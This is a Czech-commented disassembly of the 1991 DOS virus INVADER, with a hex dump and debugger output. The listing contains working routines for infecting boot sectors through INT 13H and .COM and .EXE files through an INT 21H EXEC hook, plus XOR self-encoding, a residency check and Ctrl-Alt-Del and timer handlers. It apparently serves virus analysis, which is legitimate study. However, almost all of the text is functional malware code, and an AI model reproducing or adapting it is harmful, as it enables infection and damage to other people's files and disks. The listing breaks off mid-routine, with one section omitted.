;--------------------------------------------------------------------- ; virus INVADER ziskan 21. 8. 1991 z knihvny (Baran) ; Jedna se o kombinovany virus napadajici BOOT sektor a .COM a .EXE ; soubory. Inspiraci pro EXE cast viru je JERUSALEM B virus. ;--------------------------------------------------------------------- AX=0000 BX=0000 CX=1064 DX=0000 SP=FFFE BP=0000 SI=0000 DI=0000 DS=48C5 ES=48C5 SS=48C5 CS=48C5 IP=0100 NV UP EI PL NZ NA PO NC -10:0100 E92E0B JMP 0C31 0000 E9 2E 0B 01 00 F5 54 61-28 99 05 00 00 00 14 17 i....uTa(....... 0010 E0 41 90 19 64 00 C5 48-00 00 03 00 B8 00 50 01 `A..d.EH....8.P. 0020 8F 20 20 20 20 20 20 20-20 20 20 20 20 20 90 19 . .. 0030 20 20 20 20 20 20 20 20-01 00 34 0E 60 61 00 01 ..4.`a.. 0040 20 20 F5 68 50 0D 41 00-00 25 01 00 00 00 00 01 uhP.A..%...... 0050 50 41 43 41 44 2E 45 58-45 43 4F 4D 4D 41 4E 44 PACAD.EXECOMMAND 0060 2E 43 4F 4D 2E 43 4F 4D-2E 45 58 45 10 00 00 02 .COM.COM.EXE.... 0070 00 00 80 00 30 BD 5C 00-30 BD 6C 00 30 BD 62 79 ....0=\.0=l.0=by 0080 20 49 6E 76 61 64 65 72-2C 20 46 65 6E 67 20 43 Invader, Feng C 0090 68 69 61 20 55 2E 2C 20-57 61 72 6E 69 6E 67 3A hia U., Warning: 00A0 20 44 6F 6E 27 74 20 72-75 6E 20 41 43 41 44 2E Don't run ACAD. 00B0 45 58 45 21 D8 0F 8E 0C-90 0A 90 0A 24 00 48 05 EXE!X.......$.H. 00C0 24 00 48 05 24 00 47 06-24 00 47 06 24 00 D8 0F $.H.$.G.$.G.$.X. 00D0 D8 0F 8E 0C 90 0A 90 0A-24 00 48 05 24 00 48 05 X.......$.H.$.H. 00E0 24 00 ED 05 24 00 ED 05-24 00 C1 10 C1 10 1D 0E $.m.$.m.$.A.A... 00F0 69 09 69 09 24 00 B4 04-24 00 B4 04 24 00 ED 05 i.i.$.4.$.4.$.m. ;===================================================================== ; Obsluha preruseni 8H ; 02B3 INT 3 CMP Byte Ptr CS:[003F],01 JZ 02DD PUSH AX MOV AX,CS:[003A] CMP CS:[0003],AX JA 02CD INC Word Ptr CS:[0003] 02CD PUSH CX MOV CX,CS:[0003] 02D3 NOP LOOP 02D3 POP CX POP AX 02D8 JMP 0DD5:00AB 02DD INC Word Ptr CS:[0003] CMP Word Ptr CS:[0003],8000 JA 02ED JMP 02D8 02ED PUSH DS PUSH AX PUSH BX PUSH CS POP DS CMP Byte Ptr [0048],01 JNZ 02FC JMP 0332 NOP 02FC MOV BX,[004B] DEC Byte Ptr [004A] JNZ 036D IN AL,61 AND AL,FE OUT 61,AL MOV BX,[004B] INC Word Ptr [004B] CMP BX,0096 JNZ 031D JMP 0352 NOP 031D MOV AL,[BX+01E0] MOV [004A],AL SHL BX,1 MOV AX,[BX+00B4] CMP AX,0000 JZ 0332 JMP 033B 0332 IN AL,61 AND AL,FE OUT 61,AL JMP 036D NOP 033B MOV BX,AX MOV AL,B6 OUT 43,AL MOV AX,BX OUT 42,AL MOV AL,AH OUT 42,AL IN AL,61 OR AL,03 OUT 61,AL JMP 036D 0352 IN AL,61 AND AL,FE OUT 61,AL MOV Word Ptr [004B],0000 MOV Byte Ptr [004A],01 MOV AX,8000 AND AH,[0005] MOV [0003],AX 036D POP BX POP AX POP DS 0370 JMP 02D8 ;===================================================================== ; Obsluha preruseni 9H ; 0373 CLI PUSH AX PUSH DS XOR AX,AX MOV DS,AX MOV AL,[0417] POP DS ; rozpoznani CTRL ALT DEL AND AL,0C CMP AL,0C ; Je CTRL -ALT JNZ 03B8 IN AL,60 AND AL,7F CMP AL,53 ; Je DEL JNZ 03B8 MOV AX,CS:[0003] MOV AH,[0049] MOV CL,05 CMP Byte Ptr CS:[003F],01 JNZ 03AB MOV CL,04 Word Ptr CS:[0003],8000 JB 03AB MOV CL,01 03AB SHR AH,CL CMP AL,AH JA 03B8 03B1 MOV AL,20 OUT 20,AL JMP 03BE 03B8 POP AX 03B9 JMP 0DD5:0125 03BE PUSH CS . . OBSLUHA CTRL ALT DEL + pomocne procedury . ;========================================================== ; ; 04C1 DB 0 04C2 DW ? ; ;---------------------------------------------------------- ; Cteni s RESETEM a opakovanim. ; 04C4 MOV Byte Ptr [04C1],00 MOV [04C2],AX 04CC CALL 04E9 AND AH,C3 JZ 04E8 MOV AH,00 ; RESET CALL 04E9 ;------------------------------- MOV AX,[04C2] INC Byte Ptr [04C1] CMP Byte Ptr [04C1],01 JBE 04CC STC 04E8 RET 04E9 PUSHF ; Volani puvodni obsluhy CALL FAR CS:[0634] ; preruseni 13H. RET ;===================================================================== ; Obsluha preruseni 13H ; 04F0 80FC02 CMP AH,02 ; operace cteni ? 04F3 751B JNZ 0510 04F5 F6C280 TEST DL,80 04F8 751A JNZ 0514 04FA 80FA02 CMP DL,02 04FD 7711 JA 0510 04FF 83F902 CMP CX,+02 ; pro disketu 2 sektor, 0502 750C JNZ 0510 ; 0 stopa 0504 80FE00 CMP DH,00 ; 0 hlava 0507 7507 JNZ 0510 0509 EB13 JMP 051E 050B 90 NOP 050C DB 01, 00, 80, 01 0510 E92001 JMP 0633 ; KONEC 513 DB 00 0614 80FE01 CMP DH,01 ; pro disk libovolny sektor 0517 75F7 JNZ 0510 ; 1 hlava 0519 80FD00 CMP CH,00 ; 0 stopa 051C 75F2 JNZ 0510 051E 2E803E130502 CMP Byte Ptr CS:[0513],02 0524 7407 JZ 052D 0526 2EFE061305 INC Byte Ptr CS:[0513] 052B EBE3 JMP 0510 052D 2EC606130500 MOV Byte Ptr CS:[0513],00 0533 2E803E480001 CMP Byte Ptr CS:[0048],01 0539 74D5 JZ 0510 053B 50 PUSH AX 053C 53 PUSH BX 053D 51 PUSH CX 053E 52 PUSH DX 053F 56 PUSH SI 0540 57 PUSH DI 0541 06 PUSH ES 0542 1E PUSH DS 0543 8CC8 MOV AX,CS 0545 8ED8 MOV DS,AX 0547 8EC0 MOV ES,AX 0549 88164D00 MOV [004D],DL 054D B400 MOV AH,00 054F E897FF CALL 04E9 ; RESET ZARIZENI 0552 BB0010 MOV BX,1000 0555 B80102 MOV AX,0201 0558 B90100 MOV CX,0001 055B B600 MOV DH,00 055D E889FF CALL 04E9 ; NACTI BOOT SEKTOR 0560 7243 JB 05A5 0562 F6C280 TEST DL,80 0565 7405 JZ 056C 0567 E8CE00 CALL 0638 ; PRO PEVNY DISK BOOT SEKTOR 056A 7239 JB 05A5 ; AKTIVNI PARTITION 056C B8CB3C MOV AX,3CCB ; Je virus pritomny ? 056F 39473E CMP [BX+3E],AX 0572 7518 JNZ 058C 0574 8B4740 MOV AX,[BX+40] 0577 3DFEFF CMP AX,FFFE 057A 7429 JZ 05A5 057C 2B4742 SUB AX,[BX+42] 057F 3D0400 CMP AX,0004 0582 7508 JNZ 058C 0584 E8E300 CALL 066A 0587 7303 JNB 058C 0589 E99F00 JMP 062B 058C F6064D0080 TEST Byte Ptr [004D],80 0591 7415 JZ 05A8 0593 C6064F0007 MOV Byte Ptr [004F],07 ; kam ulozit virus 0598 C606500000 MOV Byte Ptr [0050],00 ; u pevneho disku 059D C6064E0000 MOV Byte Ptr [004E],00 05A2 EB3F JMP 05E3 05A4 90 NOP 05A5 E98300 JMP 062B 05A8 C6064F0001 MOV Byte Ptr [004F],01 ; kam ulozit virus 05AD C606500028 MOV Byte Ptr [0050],28 ; u diskety 05B2 8A4715 MOV AL,[BX+15] 05B5 3CFC CMP AL,FC 05B7 7305 JNB 05BE 05B9 C606500050 MOV Byte Ptr [0050],50 05BE A05000 MOV AL,[0050] 05C1 BB8F02 MOV BX,028F 05C4 B90900 MOV CX,0009 05C7 8807 MOV [BX],AL ; U diskety zaroven 05C9 83C304 ADD BX,+04 ; preformatuj nultou 05CC E2F9 LOOP 05C7 ; stopu. 05CE B80905 MOV AX,0509 05D1 BB8F02 MOV BX,028F 05D4 C6064E0000 MOV Byte Ptr [004E],00 05D9 C6064F0001 MOV Byte Ptr [004F],01 05DE E8AD00 CALL 068E 05E1 7248 JB 062B 05E3 BB0000 MOV BX,0000 ; Zapis virus. 05E6 A14F00 MOV AX,[004F] 05E9 A3440E MOV [0E44],AX 05EC A14D00 MOV AX,[004D] 05EF A3460E MOV [0E46],AX 05F2 B80903 MOV AX,0309 05F5 E89600 CALL 068E ;----------------------- 05F8 7231 JB 062B 05FA C6064F0001 MOV Byte Ptr [004F],01 05FF C606500000 MOV Byte Ptr [0050],00 0604 F6C280 TEST DL,80 0607 740C JZ 0615 0609 A10C05 MOV AX,[050C] 060C A34F00 MOV [004F],AX 060F A10E05 MOV AX,[050E] 0612 A34D00 MOV [004D],AX 0615 BE0310 MOV SI,1003 0618 BF030E MOV DI,0E03 061B B92500 MOV CX,0025 061E 90 NOP 061F FC CLD 0620 F3A4 REPZ MOVSB 0622 BB000E MOV BX,0E00 ; Zapis virus do BOOT sektoru. 0625 B80103 MOV AX,0301 0628 E86300 CALL 068E 062B 1F POP DS 062C 07 POP ES 062D 5F POP DI 062E 5E POP SI 062F 5A POP DX 0630 59 POP CX 0631 5B POP BX 0632 58 POP AX 0633 EA88227000 JMP 0070:2288 ;------------------------------------------------------------------ ; Pro pevny disk nalezeni aktivni PARTITION a nacteni BOOT sektoru. ; 0638 MOV SI,11BE MOV BL,04 063D CMP Byte Ptr [SI],80 JZ 0650 CMP Byte Ptr [SI],00 JNZ 064E ADD SI,+10 DEC BL JNZ 063D 064E STC RET 0650 MOV AX,[SI] MOV [050E],AX MOV AX,[SI+02] MOV [050C],AX MOV DX,[SI] MOV CX,[SI+02] MOV AX,0201 MOV BX,1000 CALL 04C4 RET 066A 8B4740 MOV AX,[BX+40] 066D 33D2 XOR DX,DX 066F F77718 DIV Word Ptr [BX+18] 0672 FEC2 INC DL 0674 88164F00 MOV [004F],DL 0678 33D2 XOR DX,DX 067A F7771A DIV Word Ptr [BX+1A] 067D 88164E00 MOV [004E],DL 0681 A25000 MOV [0050],AL 0684 B80102 MOV AX,0201 0687 BB0010 MOV BX,1000 068A E80100 CALL 068E 068D C3 RET 068E 8B0E4F00 MOV CX,[004F] 0692 8B164D00 MOV DX,[004D] 0696 E82BFE CALL 04C4 0699 C3 RET ;===================================================================== ; Obsluha preruseni 21H ; 069A 9C PUSHF 069B 3D4342 CMP AX,4243 ; test pritommnosti viru 069E 7505 JNZ 06A5 06A0 B87856 MOV AX,5678 06A3 9D POPF 06A4 CF IRET 06A5 3D4442 CMP AX,4244 06A8 741F JZ 06C9 06AA 3D004B CMP AX,4B00 ; EXEC 06AD 7503 JNZ 06B2 06AF EB2E JMP 06DF 06B1 90 NOP 06B2 3D003D CMP AX,3D00 06B5 750B JNZ 06C2 06B7 2E803E3E0001 CMP Byte Ptr [003E],01 06BD 7403 JZ 06C2 06BF EB1E JMP 06DF 06C2 CC INT 3 06C3 9D POPF 06C4 EA14021C10 JMP 101C:0214 06C9 58 POP AX 06CA 58 POP AX 06CB 58 POP AX 06CC 2EA3DD06 MOV CS:[06DD],AX 06D0 F3A4 REPZ MOVSB 06D2 9D POPF 06D3 E87703 CALL 0A4D 06D6 8B0E1400 MOV CX,[0014] 06DA EA0001EE13 JMP 13EE:0100 ;==================================================================== ; obsluha sluzby EXEC ; 06DF 2EC7060A00FFFF MOV Word Ptr CS:[000A],FFFF 06E6 2EC70638000000 MOV Word Ptr CS:[0038],0000 06ED 2E89160600 MOV CS:[0006],DX 06F2 2E8C1E0800 MOV CS:[0008],DS 06F7 50 PUSH AX 06F8 53 PUSH BX 06F9 51 PUSH CX 06FA 52 PUSH DX 06FB 56 PUSH SI 06FC 57 PUSH DI 06FD 1E PUSH DS 06FE 06 PUSH ES 06FF FC CLD 0700 8BF2 MOV SI,DX 0702 8A04 MOV AL,[SI] ; konverze jmena na velka 0704 0AC0 OR AL,AL ; pismena. 0706 740E JZ 0716 0708 3C61 CMP AL,61 ;'a' 070A 7207 JB 0713 070C 3C7A CMP AL,7A ;'z' 070E 7703 JA 0713 0710 802C20 SUB Byte Ptr [SI],20 ;' ' 0713 46 INC SI 0714 EBEC JMP 0702 0716 2E89363C00 MOV CS:[003C],SI ; ukazatel za jmeno 071B 8BC6 MOV AX,SI 071D 0E PUSH CS 071E 07 POP ES 071F B90B00 MOV CX,000B 0722 2BF1 SUB SI,CX 0724 BF5900 MOV DI,0059 ; nenapadame COMMAND.COM 0727 F3A6 REPZ CMPSB 0729 7503 JNZ 072E 072B E9EA02 JMP 0A18 072E 8BF0 MOV SI,AX 0730 B90800 MOV CX,0008 0733 2BF1 SUB SI,CX 0735 BF5100 MOV DI,0051 0738 F3A6 REPZ CMPSB ; a ACAD.EXE 073A 751F JNZ 075B 073C E81903 CALL 0A58 073F 2E803E3F0001 CMP Byte Ptr CS:[003F],01 0745 7409 JZ 0750 0747 2E83063A001E ADD Word Ptr CS:[003A],+1E 074D EB08 JMP 0757 074F 90 NOP 0750 2E810603000004 ADD Word Ptr CS:[0003],0400 0757 F9 STC 0758 EB0D JMP 0767 075A 90 NOP 075B B80043 MOV AX,4300 ; atributy souboru 075E CD21 INT 21 ;---------------------- 0760 7205 JB 0767 0762 2E890E0C00 MOV CS:[000C],CX 0767 726F JB 07D8 0769 32C0 XOR AL,AL 076B 2EA21B00 MOV CS:[001B],AL 076F 2E8B363C00 MOV SI,CS:[003C] 0774 B90400 MOV CX,0004 0777 2BF1 SUB SI,CX 0779 BF6400 MOV DI,0064 ; porovname s .COM 077C F3A6 REPZ CMPSB 077E 741A JZ 079A 0780 2EFE061B00 INC Byte Ptr CS:[001B] 0785 2E8B363C00 MOV SI,CS:[003C] 078A B90400 MOV CX,0004 078D 2BF1 SUB SI,CX 078F BF6800 MOV DI,0068 0792 F3A6 REPZ CMPSB ; a .EXE 0794 7404 JZ 079A 0796 F9 STC 0797 EB3F JMP 07D8 0799 90 NOP 079A 8BFA MOV DI,DX 079C 32D2 XOR DL,DL 079E 807D013A CMP Byte Ptr [DI+01],3A ;':' 07A2 7505 JNZ 07A9 07A4 8A15 MOV DL,[DI] 07A6 80E21F AND DL,1F 07A9 B436 MOV AH,36 ; Zjisti volny prostor 07AB CD21 INT 21 ; na disku. 07AD 3DFFFF CMP AX,FFFF ; 07B0 7503 JNZ 07B5 ; 07B2 E96302 JMP 0A18 ; 07B5 F7E3 MUL BX ; 07B7 F7E1 MUL CX ; 07B9 0BD2 OR DX,DX ; 07BB 7505 JNZ 07C2 ; 07BD 3D0010 CMP AX,1000 ; 07C0 72F0 JB 07B2 ;---------------------- 07C2 2E8B160600 MOV DX,CS:[0006] 07C7 B8003D MOV AX,3D00 ; otevri soubor 07CA 2EC6063E0001 MOV Byte Ptr CS:[003E],01 07D0 CD21 INT 21 07D2 2EC6063E0000 MOV Byte Ptr CS:[003E],00 07D8 7267 JB 0841 07DA 2EA30A00 MOV CS:[000A],AX 07DE 8BD8 MOV BX,AX 07E0 B80242 MOV AX,4202 ; SEEK na konec - 5 07E3 B9FFFF MOV CX,FFFF 07E6 BAFBFF MOV DX,FFFB 07E9 CD21 INT 21 07EB 7254 JB 0841 07ED 050500 ADD AX,0005 07F0 2EA31400 MOV CS:[0014],AX 07F4 B80042 MOV AX,4200 07F7 B90000 MOV CX,0000 ; SEEK na zacatek + 12 07FA BA1200 MOV DX,0012 07FD CD21 INT 21 07FF 7240 JB 0841 0801 B90200 MOV CX,0002 0804 BA3600 MOV DX,0036 0807 8BFA MOV DI,DX 0809 8CC8 MOV AX,CS 080B 8ED8 MOV DS,AX 080D 8EC0 MOV ES,AX 080F B43F MOV AH,3F ; precteme 2 byte 0811 CD21 INT 21 0813 8B05 MOV AX,[DI] 0815 3D9019 CMP AX,1990 ; Pokud jsou 1990, koncime. 0818 7507 JNZ 0821 081A B43E MOV AH,3E 081C CD21 INT 21 081E E9F701 JMP 0A18 0821 B82435 MOV AX,3524 ; redefinice preruseni 24H 0824 CD21 INT 21 0826 891E230A MOV [0A23],BX 082A 8C06250A MOV [0A25],ES 082E BA270A MOV DX,0A27 0831 B82425 MOV AX,2524 0834 CD21 INT 21 ;-------------------------- 0836 C5160600 LDS DX,[0006] 083A 33C9 XOR CX,CX 083C B80143 MOV AX,4301 ; nastav atributy 083F CD21 INT 21 0841 723B JB 087E 0843 2E8B1E0A00 MOV BX,CS:[000A] 0848 B43E MOV AH,3E ; zavri soubor 084A CD21 INT 21 084C 2EC7060A00FFFF MOV Word Ptr CS:[000A],FFFF 0853 B8023D MOV AX,3D02 ; otevri v R/W modu 0856 CD21 INT 21 0858 7224 JB 087E 085A 2EA30A00 MOV CS:[000A],AX 085E 8CC8 MOV AX,CS 0860 8ED8 MOV DS,AX 0862 8EC0 MOV ES,AX 0864 8B1E0A00 MOV BX,[000A] 0868 B80057 MOV AX,5700 ; datum posledni modifikace 086B CD21 INT 21 086D 89160E00 MOV [000E],DX 0871 890E1000 MOV [0010],CX 0875 B80042 MOV AX,4200 ; seek na zacatek 0878 33C9 XOR CX,CX 087A 8BD1 MOV DX,CX 087C CD21 INT 21 087E 7255 JB 08D5 0880 803E1B0000 CMP Byte Ptr [001B],00 0885 7403 JZ 088A 0887 EB6B JMP 08F4 ;--------------------------------------------------------------- ; OBSLUHA .COM souboru. ; 088A BB0010 MOV BX,1000 088D B448 MOV AH,48 088F CD21 INT 21 0891 730B JNB 089E 0893 B43E MOV AH,3E 0895 8B1E0A00 MOV BX,[000A] 0899 CD21 INT 21 089B E97A01 JMP 0A18 089E FF063800 INC Word Ptr [0038] 08A2 8EC0 MOV ES,AX 08A4 33F6 XOR SI,SI 08A6 8BFE MOV DI,SI 08A8 A10300 MOV AX,[0003] 08AB 0C01 OR AL,01 08AD A20500 MOV [0005],AL 08B0 C606480001 MOV Byte Ptr [0048],01 08B5 E87201 CALL 0A2A 08B8 B90010 MOV CX,1000 08BB F3A4 REPZ MOVSB 08BD E86A01 CALL 0A2A 08C0 C606480000 MOV Byte Ptr [0048],00 08C5 8BD7 MOV DX,DI 08C7 8B0E1400 MOV CX,[0014] 08CB 8B1E0A00 MOV BX,[000A] 08CF 06 PUSH ES 08D0 1F POP DS 08D1 B43F MOV AH,3F 08D3 CD21 INT 21 08D5 7215 JB 08EC 08D7 03F9 ADD DI,CX 08D9 7211 JB 08EC 08DB 33C9 XOR CX,CX 08DD 8BD1 MOV DX,CX 08DF B80042 MOV AX,4200 08E2 CD21 INT 21 08E4 8BCF MOV CX,DI 08E6 33D2 XOR DX,DX 08E8 B440 MOV AH,40 08EA CD21 INT 21 08EC 7210 JB 08FE 08EE E86701 CALL 0A58 08F1 E9DF00 JMP 09D3 ;--------------------------------------------------------------- ; OBSLUHA .EXE souboru. ; 08F4 B91C00 MOV CX,001C ; nacteni .EXE headeru 08F7 BA1C00 MOV DX,001C 08FA B43F MOV AH,3F 08FC CD21 INT 21 08FE 7252 JB 0952 0900 813E2E009019 CMP Word Ptr [002E],1990 ; kontrolni suma 0906 744A JZ 0952 0908 C7062E009019 MOV Word Ptr [002E],1990 090E A12A00 MOV AX,[002A] ; SS 0911 A34200 MOV [0042],AX 0914 A12C00 MOV AX,[002C] ; SP 0917 A34000 MOV [0040],AX 091A A13000 MOV AX,[0030] ; IP 091D A3A60B MOV [0BA6],AX 0920 A13200 MOV AX,[0032] ; CS 0923 A3A80B MOV [0BA8],AX 0926 A12000 MOV AX,[0020] ; pocet bloku 0929 833E1E0000 CMP Word Ptr [001E],+00 092E 7401 JZ 0931 0930 48 DEC AX 0931 F7266E00 MUL Word Ptr [006E] 0935 03061E00 ADD AX,[001E] ; byte v poslednim bloku 0939 83D200 ADC DX,+00 093C 050F00 ADD AX,000F 093F 83D200 ADC DX,+00 0942 25F0FF AND AX,FFF0 0945 A34400 MOV [0044],AX 0948 89164600 MOV [0046],DX 094C 050010 ADD AX,1000 094F 83D200 ADC DX,+00 0952 723A JB 098E 0954 F7366E00 DIV Word Ptr [006E] 0958 0BD2 OR DX,DX 095A 7401 JZ 095D 095C 40 INC AX 095D A32000 MOV [0020],AX 0960 89161E00 MOV [001E],DX 0964 A14400 MOV AX,[0044] 0967 8B164600 MOV DX,[0046] 096B F7366C00 DIV Word Ptr [006C] 096F 2B062400 SUB AX,[0024] 0973 A33200 MOV [0032],AX 0976 C7063000630B MOV Word Ptr [0030],0B63 097C A32A00 MOV [002A],AX 097F C7062C00FE0D MOV Word Ptr [002C],0DFE 0985 33C9 XOR CX,CX 0987 8BD1 MOV DX,CX 0989 B80042 MOV AX,4200 098C CD21 INT 21 098E 720A JB 099A 0990 B91C00 MOV CX,001C 0993 BA1C00 MOV DX,001C 0996 B440 MOV AH,40 0998 CD21 INT 21 099A 7211 JB 09AD 099C 3BC1 CMP AX,CX 099E 7533 JNZ 09D3 09A0 8B164400 MOV DX,[0044] 09A4 8B0E4600 MOV CX,[0046] 09A8 B80042 MOV AX,4200 09AB CD21 INT 21 09AD 7224 JB 09D3 09AF A10300 MOV AX,[0003] 09B2 0C01 OR AL,01 09B4 A20500 MOV [0005],AL 09B7 C606480001 MOV Byte Ptr [0048],01 09BC E86B00 CALL 0A2A 09BF 33D2 XOR DX,DX 09C1 B90010 MOV CX,1000 09C4 B440 MOV AH,40 09C6 CD21 INT 21 09C8 E85F00 CALL 0A2A 09CB C606480000 MOV Byte Ptr [0048],00 09D0 E88500 CALL 0A58 09D3 2E833E380000 CMP Word Ptr CS:[0038],+00 09D9 7404 JZ 09DF 09DB B449 MOV AH,49 09DD CD21 INT 21 09DF 2E833E0A00FF CMP Word Ptr CS:[000A],-01 09E5 7431 JZ 0A18 09E7 2E8B1E0A00 MOV BX,CS:[000A] 09EC 2E8B160E00 MOV DX,CS:[000E] 09F1 2E8B0E1000 MOV CX,CS:[0010] 09F6 B80157 MOV AX,5701 09F9 CD21 INT 21 09FB B43E MOV AH,3E 09FD CD21 INT 21 09FF 2EC5160600 LDS DX,CS:[0006] 0A04 2E8B0E0C00 MOV CX,CS:[000C] 0A09 B80143 MOV AX,4301 0A0C CD21 INT 21 0A0E 2EC516230A LDS DX,CS:[0A23] 0A13 B82425 MOV AX,2524 0A16 CD21 INT 21 0A18 07 POP ES 0A19 1F POP DS 0A1A 5F POP DI 0A1B 5E POP SI 0A1C 5A POP DX 0A1D 59 POP CX 0A1E 5B POP BX 0A1F 58 POP AX 0A20 E99FFC JMP 06C2 0A23 BF0563 MOV DI,6305 0A26 16 PUSH SS ;=============================================================== ; Obsluha preruseni 24H ; 0A27 32C0 XOR AL,AL 0A29 CF IRET ;===================================================================== ; KODOVACI PROCEDURA kodujeme od 51H o delce 262H. ; 0A2A 1E PUSH DS 0A2B 06 PUSH ES 0A2C 57 PUSH DI 0A2D 56 PUSH SI 0A2E 51 PUSH CX 0A2F 50 PUSH AX 0A30 0E PUSH CS 0A31 07 POP ES 0A32 0E PUSH CS 0A33 1F POP DS 0A34 BE5100 MOV SI,0051 0A37 8BFE MOV DI,SI 0A39 B96202 MOV CX,0262 0A3C 8A260500 MOV AH,[0005] 0A40 AC LODSB 0A41 32C4 XOR AL,AH 0A43 AA STOSB 0A44 E2FA LOOP 0A40 0A46 58 POP AX 0A47 59 POP CX 0A48 5E POP SI 0A49 5F POP DI 0A4A 07 POP ES 0A4B 1F POP DS 0A4C C3 RET 0A4D 33C0 XOR AX,AX 0A4F 8BD8 MOV BX,AX 0A51 8BD0 MOV DX,AX 0A53 8BF0 MOV SI,AX 0A55 8BF8 MOV DI,AX 0A57 C3 RET 0A58 2EFE064900 INC Byte Ptr CS:[0049] 0A5D C3 RET 0A5E 1E PUSH DS 0A5F 0E PUSH CS 0A60 1F POP DS 0A61 B400 MOV AH,00 0A63 CD1A INT 1A 0A65 8BDA MOV BX,DX 0A67 CD1A INT 1A 0A69 3BDA CMP BX,DX 0A6B 74FA JZ 0A67 0A6D 33F6 XOR SI,SI 0A6F 8BDA MOV BX,DX 0A71 CD1A INT 1A 0A73 46 INC SI 0A74 3BDA CMP BX,DX 0A76 74F9 JZ 0A71 0A78 8BDE MOV BX,SI 0A7A D1E3 SHL BX,1 0A7C 891E3A00 MOV [003A],BX 0A80 C6063F0000 MOV Byte Ptr [003F],00 0A85 C606480000 MOV Byte Ptr [0048],00 0A8A E440 IN AL,40 0A8C 8AE0 MOV AH,AL 0A8E E440 IN AL,40 0A90 8AC4 MOV AL,AH 0A92 2E32060500 XOR AL,CS:[0005] 0A97 3C1F CMP AL,1F 0A99 7705 JA 0AA0 0A9B C6063F0001 MOV Byte Ptr [003F],01 0AA0 C70603000100 MOV Word Ptr [0003],0001 0AA6 C7064B000000 MOV Word Ptr [004B],0000 0AAC C6064A0001 MOV Byte Ptr [004A],01 0AB1 C6063E0000 MOV Byte Ptr [003E],00 0AB6 C606730F00 MOV Byte Ptr [0F73],00 0ABB 90 NOP 0ABC 1F POP DS 0ABD C3 RET ;===================================================================== ; ; -10:0BBE 1E PUSH DS -10:0BBF 06 PUSH ES -10:0BC0 33C0 XOR AX,AX -10:0BC2 8ED8 MOV DS,AX -10:0BC4 A11304 MOV AX,[0413] ; velikost pammeti v KB -10:0BC7 B106 MOV CL,06 ; prepocet na paragrafy -10:0BC9 D3E0 SHL AX,CL -10:0BCB 8ED8 MOV DS,AX -10:0BCD 33F6 XOR SI,SI ; Na konci pameti hledame -10:0BCF 8B443E MOV AX,[SI+3E] ; zda je virus pritommny. -10:0BD2 3DCB3C CMP AX,3CCB -10:0BD5 7434 JZ 0C0B ; -10:0BD7 833E400EFE CMP Word Ptr [0E40],-02 -10:0BDC 7403 JZ 0BE1 -10:0BDE EB4E JMP 0C2E -10:0BE0 90 NOP -10:0BE1 FA CLI -10:0BE2 B3FF MOV BL,FF -10:0BE4 B84342 MOV AX,4243 -10:0BE7 CD21 INT 21 -10:0BE9 3D7856 CMP AX,5678 -10:0BEC 741A JZ 0C08 -10:0BEE C606740F01 MOV Byte Ptr [0F74],01 -10:0BF3 90 NOP -10:0BF4 FB STI -10:0BF5 B82135 MOV AX,3521 -10:0BF8 CD21 INT 21 -10:0BFA 891EC506 MOV [06C5],BX -10:0BFE 8C06C706 MOV [06C7],ES -10:0C02 BA9A06 MOV DX,069A -10:0C05 B82125 MOV AX,2521 -10:0C08 EB24 JMP 0C2E -10:0C0A 90 NOP -10:0C0B C7443EFEFF MOV Word Ptr [SI+3E],FFFE -10:0C10 33C0 XOR AX,AX -10:0C12 8ED8 MOV DS,AX -10:0C14 8EC0 MOV ES,AX -10:0C16 BE0402 MOV SI,0204 -10:0C19 BF2000 MOV DI,0020 -10:0C1C B90200 MOV CX,0002 -10:0C1F FA CLI -10:0C20 F3 A5 REPZ MOVSW -10:0C22 FB STI -10:0C23 BE0C02 MOV SI,020C -10:0C26 BF4C00 MOV DI,004C -10:0C29 B90200 MOV CX,0002 -10:0C2C F3 A5 REPZ MOVSW -10:0C2E 07 POP ES -10:0C2F 1F POP DS -10:0C30 C3 RET ;--------------------------------------------------------------------- ; pocatek viru pro COM ; -10:0C31 E88AFF CALL 0BBE -10:0C34 B3FF MOV BL,FF -10:0C36 B84342 MOV AX,4243 -10:0C39 CD21 INT 21 -10:0C3B 3D7856 CMP AX,5678 -10:0C3E 7513 JNZ 0C53 -10:0C40 B84442 MOV AX,4244 -10:0C43 BF0001 MOV DI,0100 -10:0C46 2E8B8D1400 MOV CX,CS:[DI+0014] -10:0C4B BE0010 MOV SI,1000 -10:0C4E 03F7 ADD SI,DI -10:0C50 FC CLD -10:0C51 CD21 INT 21 -10:0C53 8CCB MOV BX,CS -10:0C55 83C310 ADD BX,+10 -10:0C58 8ED3 MOV SS,BX -10:0C5A BCEE0D MOV SP,0DEE -10:0C5D 53 PUSH BX -10:0C5E BB630B MOV BX,0B63 -10:0C61 53 PUSH BX -10:0C62 CB RETF ;--------------------------------------------------------------------- ; ZDE POKRACUJEME PO RETF (C62) + pocatek pro EXE ; AX=0006 BX=0B63 CX=1006 DX=0000 SP=0DEE BP=0000 SI=0000 DI=0000 DS=48C5 ES=48C5 SS=CS CS=CS IP=0B63 NV UP EI PL NZ NA PO NC 0B63 FC CLD 0B64 06 PUSH ES 0B65 E856FF CALL 0ABE (procedura BBE) 0B68 2E8C061600 MOV CS:[0016],ES 0B6D 2E8C067400 MOV CS:[0074],ES 0B72 2E8C067800 MOV CS:[0078],ES 0B77 2E8C067C00 MOV CS:[007C],ES 0B7C 8CC3 MOV BX,ES 0B7E 83C310 ADD BX,+10 0B81 2E011EA80B ADD CS:[0BA8],BX 0B86 2E011E4200 ADD CS:[0042],BX 0B8B B3FF MOV BL,FF 0B8D B84342 MOV AX,4243 0B90 CD21 INT 21 0B92 3D7856 CMP AX,5678 0B95 7513 JNZ 0BAA 0B97 07 POP ES 0B98 2E8E164200 MOV SS,CS:[0042] 0B9D 2E8B264000 MOV SP,CS:[0040] 0BA2 E8A8FE CALL 0A4D 0BA5 EA20202020 JMP 2020:2020 0BAA E87DFE CALL 0A2A 0BAD E8AEFE CALL 0A5E 0BB0 33C0 XOR AX,AX 0BB2 8EC0 MOV ES,AX 0BB4 26A1F003 MOV AX,ES:[03F0] 0BB8 2EA31800 MOV CS:[0018],AX 0BBC 26A0F203 MOV AL,ES:[03F2] 0BC0 2EA21A00 MOV CS:[001A],AL 0BC4 26C706F003F3A5 MOV Word Ptr ES:[03F0],A5F3 ; 0:3F0 F3 A5 REPZ MOVSW 0BCB 26C606F203CB MOV Byte Ptr ES:[03F2],CB ; 0:3F2 CB RETF 0BD1 58 POP AX 0BD2 051000 ADD AX,0010 0BD5 8EC0 MOV ES,AX 0BD7 0E PUSH CS 0BD8 1F POP DS 0BD9 B90010 MOV CX,1000 0BDC D1E9 SHR CX,1 